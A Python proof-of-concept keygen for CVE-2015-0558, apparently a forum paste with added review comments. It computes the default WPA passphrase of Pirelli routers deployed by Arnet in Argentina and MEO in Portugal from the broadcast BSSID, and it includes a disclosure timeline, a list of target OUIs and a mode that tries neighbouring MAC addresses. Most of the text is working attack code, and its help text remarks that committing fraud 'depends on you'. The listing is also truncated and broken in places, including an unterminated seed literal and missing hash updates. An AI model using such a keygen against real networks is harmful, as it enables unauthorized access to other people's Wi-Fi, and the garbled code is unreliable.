Pirelli Router P.DG-A4001N WPA Key Reverse Engineering Rev 2


#!/usr/bin/env python
# -*- coding: utf-8 -*-

@license: GPLv3
@author : Eduardo Novella
@ARNetOnline via Twitter @enovella_
2014-09-15 Sent a message via the website form; still looking for a plain e-mail contact (http://www.telecom.com.ar/hogares/contacto_tecnico.html)
2014-09-16 Sent another message to Arnet via the website. First reply via Twitter, where they redirect me to the same website form.
2014-09-19 Direct message via Twitter. I tell them about the critical vulnerability and offer to send the details by e-mail, PGP key included.
2014-09-20 More Twitter DMs about the same. They do not want to hear about the problem, though.
2014-09-23 Given that lack of interest, I assume Arnet does not care about its clients' security at all.
2014-09-24 I send the problem to the vendor ADB Pirelli via website form
2014-09-28 I send the problem to the vendor ADB Pirelli via email to Switzerland
2015-01-05 Full disclosure and CVE-2015-0558 assigned

2015-04-01 I receive an email confirming that the Portuguese ISP "MEO" uses the same algorithm
2015-04-05 Send a message to @MEOpt via Twitter @enovella_
2015-04-05 I got a response within minutes \o/
2015-04-05 I send an e-mail to luis-oliveira-cc@telecom.pt, quoting the reference 3-78405621289 in the subject line
2015-05-07 Full disclosure

[*] Changelog :
2015-05-06 v1.4 Added MEO routers in Portugal. Essid ADSLPT-ABXXXXX
2015-02-01 v1.3 Final version, hopefully
2015-01-12 v1.2 Confusion between LAN and WLAN mac address
2015-01-10 v1.1 --allKeys flag added
2014-09-11 v1.0 First PoC working


import re
import sys
import hashlib
import argparse

# Release date of this script; shown in the --version output built in main().
DATEVERSION = '2015-05-06'
# Project page appended to the --version output.
# NOTE(review): main() also formats VERSION and SUBVERSION into that string,
# but neither name is defined anywhere in this listing -- lost in the paste.
URL = 'http://www.ednolo.alumnos.upv.es'

def genkey(mac,stdout='True'):
# Derive the router's default WPA passphrase from a 6-byte MAC (a bytearray,
# as produced by addIncToMac). The visible steps: SHA-256 digest, then each
# of the first 10 digest bytes is reduced mod 36 and mapped onto [0-9a-z],
# giving a 10-character key. Callers slice it to 8 characters for the
# Portuguese (ADSLPT-AB...) variant.
#
# Security note: everything that goes into the hash is a constant plus the
# BSSID, which the access point broadcasts in clear. Anyone in radio range
# can therefore compute the default key; the only user-side mitigation is to
# replace the factory passphrase (CVE-2015-0558, see header timeline).
#
# NOTE(review): this forum paste is truncated here. The seed literal below is
# an unterminated '(' ... +' expression (apparently only its first 16 bytes),
# and the sha256.update(...) calls that presumably feed the seed and the MAC
# into the hash are missing. Recover both from the original release before
# running; do not guess the missing seed bytes.
# NOTE(review): the default stdout='True' is the *string* 'True', which is
# only truthy by accident; callers pass the bool False to silence the hexdump.
seed = ('\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15' +

# 36-symbol alphabet. 256 is not a multiple of 36, so 'x % 36' is slightly
# biased towards the first 4 symbols -- irrelevant for the PoC, but worth
# knowing if the output is ever compared against keyspace estimates.
lookup = '0123456789abcdefghijklmnopqrstuvwxyz'

sha256 = hashlib.sha256()

digest = bytearray(sha256.digest())

if (stdout):
print "[+] SHA256 : %s" % sha256.hexdigest()

# One symbol per digest byte; only the first 10 bytes are used.
return ''.join([lookup[x % len(lookup)] for x in digest[0:10]])

def printTargets():
    """Print every OUI prefix in the module-level ``targets`` list.

    Each entry is shown as a masked BSSID (``AA:BB:CC:XX:XX:XX``) next to
    the two ESSID patterns this keygen covers, so a user can compare the
    list against what their wireless scanner reports. Relies on main()
    having populated ``targets`` first.
    """
    template = "\t bssid: {0:s}:XX:XX:XX \t essid: WiFi-Arnet-XXXX, ADSLPT-ABXXXXX"
    print("[+] Possible vulnerable targets so far:")
    for oui in targets:
        print(template.format(oui.upper()))


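def checkTargets(bssid, known=None):
    """Warn when *bssid* does not start with a known vulnerable OUI.

    Args:
        bssid: MAC address as typed by the user. Any separator (``:``,
            ``-``, ``.``) or none at all is accepted; the comparison is done
            on the hex digits only, case-insensitively. The original
            required the exact ``AA:BB:CC`` colon form and would silently
            report every other spelling as unsupported.
        known: iterable of OUI prefixes in ``AA:BB:CC`` form. Defaults to
            the module-level ``targets`` list populated by main().

    Returns:
        True when the OUI matches a known prefix, False otherwise. The
        function only warns; it never refuses to continue, because the OUI
        list is a heuristic and routers with unlisted OUIs may still use
        the same key derivation.
    """
    prefixes = targets if known is None else known
    # Compare on bare hex digits so '74:88:8B', '74-88-8b' and '74888b'
    # all match the same OUI entry.
    hexdigits = re.sub(r'[^a-fA-F0-9]', '', bssid).upper()
    supported = any(
        hexdigits.startswith(re.sub(r'[^a-fA-F0-9]', '', prefix).upper())
        for prefix in prefixes
    )
    if not supported:
        print("[!] Your bssid looks like not supported! Generating anyway.")
    return supported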

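def addIncToMac(mac_str, inc):
    """Return *mac_str* shifted by *inc* as a 6-byte bytearray.

    Args:
        mac_str: 12 hex digits without separators (main() strips them).
        inc: signed offset added to the 48-bit value. --allkeys uses this
            to try the neighbouring addresses, because the BSSID seen on
            air may differ from the address the key was derived from by a
            small offset (changelog v1.2, "LAN and WLAN mac address").

    Returns:
        bytearray of exactly 6 bytes, suitable as input to genkey().

    Exits:
        Via sys.exit('[!] Use real input ') when *mac_str* is not valid
        hex. The forum paste dropped the try/except that wrapped the
        conversion; this restores that user-facing behaviour.

    Note:
        The sum is reduced modulo 2**48 before formatting. Without that,
        stepping below 00:00:00:00:00:00 produced a negative number (and a
        ValueError from fromhex), and stepping above FF:FF:FF:FF:FF:FF
        produced 13 hex digits, i.e. a 7-byte value that would have been
        hashed silently and yielded a wrong key.
    """
    try:
        value = int(mac_str, 16)
    except (ValueError, TypeError):
        sys.exit('[!] Use real input ')
    # Wrap inside the 48-bit MAC space so the result is always 6 bytes.
    value = (value + inc) & 0xFFFFFFFFFFFF
    return bytearray.fromhex('%012x' % value)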

def main():
# Command-line entry point: parse -b/--bssid (plus -l or -a) and print the
# derived default WPA key(s).
# NOTE(review): this listing is a forum paste and is truncated in several
# places -- the `targets` list, the ArgumentParser(...) call and the
# `if args.list:` body all end abruptly, and VERSION/SUBVERSION are not
# defined anywhere in the visible file. Do not run it as-is.

global targets
version = " {0:d}.{1:d} [{2:s}] ----> {3:s}".format(VERSION,SUBVERSION,DATEVERSION,URL)
# OUI prefixes (first three octets, upper-case, colon form) of BSSIDs
# believed to ship with this key scheme; consumed by printTargets() and
# checkTargets(). The list continues past this line in the original.
targets = ['00:08:27','00:13:C8','00:17:C2','00:19:3E','00:1C:A2','00:1D:8B','00:22:33','00:8C:54',

# The description/epilog below are runtime strings; the call is missing its
# closing parenthesis in this paste.
parser = argparse.ArgumentParser(description='''>>> PoC WPA keygen for WiFi Networks deployed by Arnet in Argentina and
MEO in Portugal. So far only WiFi networks with essids like WiFi-Arnet-XXXX
or ADSLPT-ABXXXXX and manufactured by Pirelli are likely vulnerable. See
[url]http://ednolo.alumnos.upv.es/[/url] for more details. Twitter: @enovella_ and
email: ednolo[at]inf.upv.es. This software is used just as proof-of-concept,
commit fraud depends on you! ''',
epilog='''(+) Help: python %s -b 74:88:8B:AD:C0:DE ''' %(sys.argv[0])

maingroup = parser.add_argument_group(title='required')
# nargs='?' means a bare '-b' yields None, which then falls through to the
# final sys.exit below instead of a parser error.
maingroup.add_argument('-b','--bssid', type=str, nargs='?', help='Target mac address')
parser.add_argument('-v', '--version', action='version', version='%(prog)s'+version)
command_group = parser.add_mutually_exclusive_group()
command_group.add_argument('-l','--list', help='List all vulnerable targets', action='store_true')
# Despite the help text this is not a brute force: it only tries a handful
# of neighbouring MAC offsets (see the --allkeys branch below).
command_group.add_argument('-a','--allkeys', help='Bruteforce mode', action="store_true")

args = parser.parse_args()

if args.list:
# (branch body lost in the paste -- presumably printTargets())
elif args.bssid:
# Normalise: drop every non-hex character, then require exactly 12 hex digits.
mac_str = re.sub(r'[^a-fA-F0-9]', '', args.bssid)
if len(mac_str) != 12:
sys.exit('[!] Check MAC format!\n')

print '[+] MAC : %s' % args.bssid

# --allkeys: the BSSID seen on air may differ from the address the key was
# derived from by a small offset (changelog v1.2), so try offsets -2..+4
# around the given address and let the user try each candidate.
if (args.allkeys):
print '\n[+] WPA keys for SSID: WiFi-Arnet-XXXX (Argentina)'
for i in xrange(-2,5):
mac = addIncToMac(mac_str,i)
print '%-10s' % ((genkey(mac, False)))

# MEO (Portugal) keys are the first 8 characters of the same derivation.
print '\n[+] WPA keys for SSID: ADSLPT-ABXXXXX (Portugal)'
for i in xrange(-2,5):
mac = addIncToMac(mac_str,i)
print '%-10s' % ((genkey(mac, False)[:8]))

# Default path: one key for the exact BSSID, shown in both the 10-char
# (Arnet) and 8-char (MEO) forms.
wpa = genkey((addIncToMac(mac_str,0)), False)
print '[+] WPA key : %-10s\t%-10s' % (wpa, "SSID: WiFi-Arnet-XXXX (Argentina)")
print '[+] WPA key : %-10s\t%-10s' % (wpa[:8], "SSID: ADSLPT-ABXXXXX (Portugal)" )

# Presumably the else branch: neither -l nor a usable -b was given.
sys.exit('[!] Are you trying to crash me? ')

if __name__ == "__main__":
# NOTE(review): the `main()` call that belongs here was lost in the forum paste.

